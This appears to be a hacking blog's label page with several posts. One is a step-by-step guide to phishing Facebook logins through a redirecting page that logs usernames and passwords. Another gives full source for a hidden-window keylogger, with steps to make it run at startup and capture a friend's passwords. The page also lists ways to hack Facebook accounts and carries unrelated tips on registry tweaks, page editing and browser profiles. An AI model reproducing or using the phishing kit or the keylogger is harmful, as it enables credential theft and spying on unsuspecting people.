Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Hacking Facebook Accounts Using RU-PHISHING


What is PHISHING..?


    Phishing is an act of sending fake login page which is old one


What is RU-PHISHING..?


  •      RU-PHISHING is "redirecting url to Phishing Page " ( instead of sending  direct page ).
  •     what you have to do is, send an attractive page  to victim,with in 4 0r 5     seconds(as u specified),he will be redirected to phishing page.
  •       This will look like facebook internal problem.



              If u want clear idea ,Have a look at this PHISHING LINK


  •      I am using javascript code for this 
                       setTimeOut("your phishing page","time in milliseconds");


Step by Step Process



1.First of all,Downloads Codes here   

      After Downloading Extract the files.It contains  4 files.
     

2.After that, upload those files in your favourite webhosting.


                 If  you dont know how to upload files to hosting,click here


3.send the link to victim ( choose it wisely,dont simply send)


                 one of my freinds used This Technique  



4.If victim logged in to ur page,you will get logs in LOG.txt ( something like
  uername= and pass= )

       
                     

  

5.Thats it,you r done..

                                            Happy Hacking

newer post

Windows 7 shutdown Trick

The  Problem  With  the  Windows 7  is  that  it   starts  up  fast  but  it  does  not  shut  down  as fast  as  u  expect.  The  Reason  Behind  This  may  be  it  took  so  long  time  to  close  all background  programs  and  OS  procedures.


 So, Here  is  a  Registry  Hack (trick)  to  shutdown  faster




1.press windows button +r   ( or search for 'run')

2.type regedit and enter



     

 



3.Now Go To the Below Path
 
    HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control


     click on control


4.In The Right Side Window find  " WaitToKillServiceTimeout  "  ( have a look at image )


         right click on it and click " modify  "























5.Change The Value to 2000 ( or above )


6.Click OK..Now You are Done


Feel Free To Share The Article 
newer post

TROJAN HORSE



What Is Trojan.............?

                   Trojans are the programs designed by hacker to get  remote access to a targeted computer system .Once a Trojan has been installed on a targeted computer system, hackers may be given remote access to the computer allowing them to perform all kinds of operations.They are not just like viruses,because they are not replicating itself.But it spreads quickly via Internet communication.

Operation Of  Trojans..

1.Watching the user's screen

2.Crashing the computer

3.Keystroke logging (Including usernames and password )

4.Use of the machine as part of a botnet (e.g. to perform  
  automated spamming or to distribute Denial-of-service attacks)

5.Electronic money theft

6.Data theft (e.g. retrieving passwords or credit card
  information)

7.Installation of software, including third-party malwares

8.Downloading or uploading of files on the user's computer

9.Modification or deletion of files

10.Anonymising internet viewing


How To Avoid Trojan Horse Infection ?


1.Don't script,don't try to paste or type some scripts on your web-
  browser.That may gives full access of
  your system to a malicious hacker.

2.Never download files blindly,you have to check that file before you downloading it.www.virustotal.com
   may help you.

3.Open the files after scanning it using a updated antivirus software,even it comes from your friend.

4.Beware of hidden file extensions,windows usually hides the extension of a file.For an example,smile.jpg
   might really be smile.jpg.exe !.Yes,It may be a executable Trojan.

5.Remember a truth:You are not well protected.

newer post

TOP 5 Methods To Hack Facebook Account

Many People Want to hack  facebook accounts...Here are the top methods to hack facebook accounts

1.Phishing

2.KeyLoggers

3.Social ENgineering

4.Cookie Stealing

5.Session Hijacking

I will Explain Each and Every Technique With In a Days................


Note:

There is No software Specially Designed for Hacking Facebook.....They MAy Be Virus or Malwares

SO,DOnt Download Any Such Softwares,,,,
newer post

Steel passwords of any one ,who logged in to your system


The Following Code Captures All The Key Strokes Of  your keyBoard

NOTE: I am not responsible for any misuse of code
So when Your Friend  Logged  In Your System,His password or chating list will be captured...

1.  Code:
   If u Dont know c or c++.. You can simply download .exe file from here http://www.mediafire.com/?wyi9r6kh3k9hktx
 and Move to Step 2

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
int I;
while (1)
{
 for (I = 8; I<= 190; I++)
 {
  if (GetAsyncKeyState(I) == -32767)
  Save (I,"log.txt");
 }
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

2.After getting key logger.exe file 
  save it in your secret folder(say folder name as Keylog)
3.create a shortcut to .exe file and save it in the following path(for windows 7)
   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
4.Run the file by just clicking on it
5.Now all your keystrokes will be stored in  log.txt(see in secret folder where your key logger.exe file is stored)
6.Thats it....Now all the Keystrokes will be captured and search for passwords in log.txt


How To Stop Keylogger(capturing)
1.If u Want to Permanently stop capturing ...just delete short cut in startup folder as specified above
2.if you want to stop for current session(untill you logoff or shutdown)
    got to task manager(ctrl+alt+del) ,click on processes tab and end  key logger.exe process 




If you Have Any Quires Regarding Post,just comment Here.. 
    

newer post

Code to Edit any Web page in Browser

     
        Edit any webpage with just this javascript code 









1.Go To the page,which you want to edit

2.Enter " javascript:" in address bar ( without quotes ,Enter Manually dont try to copy and paste)

3.Append the code (u can copy this) 

document.body.contentEditable='true'; document.designMode='on'; void 0


4.Hit Enter

Thats it You can edit the webpage (Some texts are image files,you cant edit images)


If u take snapshot of it by using either "snipping tool" or by print screen key

If You are facing any problem just comment here.......
newer post

Open multiple facebook accounts in a Browser

How to open multiple accounts in a browser

1.Google chrome ctrl+shift+N
2.Firefox 

In FireFox,it is some what difficult ,But This is for Firefox Fans (I prefer 
Google chrome )

a) open Run and type 
firefox -no-remote -P
b) Create an extra profile by using the Create Profile wizard, and make sure that each profile has a distinct name. You’ll also want to leave the “Don’t ask at startup” box checked.

c)select created profile

If you want to login to another ( 3 rd account ) then follow from
step a

I suggest you to use Google chrome for multiple logins

If you Have any problem regarding this, just comment here.....
How to open multiple accounts in a browser

1.  In  Google chrome           press     ctrl+shift+N   (opens a new incognito window )



2.In  Firefox 


In FireFox,it is some what difficult ,But This is for Firefox Fans (I prefer 
Google chrome )

a) open Run and type 
firefox -no-remote -P
b) Create an extra profile by using the Create Profile wizard, and make sure that each profile has a distinct name. You’ll also want to leave the “Don’t ask at startup” box checked.

c)select created profile

If you want to login to another ( 3 rd account ) then follow from
step a

I suggest you to use Google chrome for multiple logins

If you Have any problem regarding this, just comment here.....
newer post
older post Home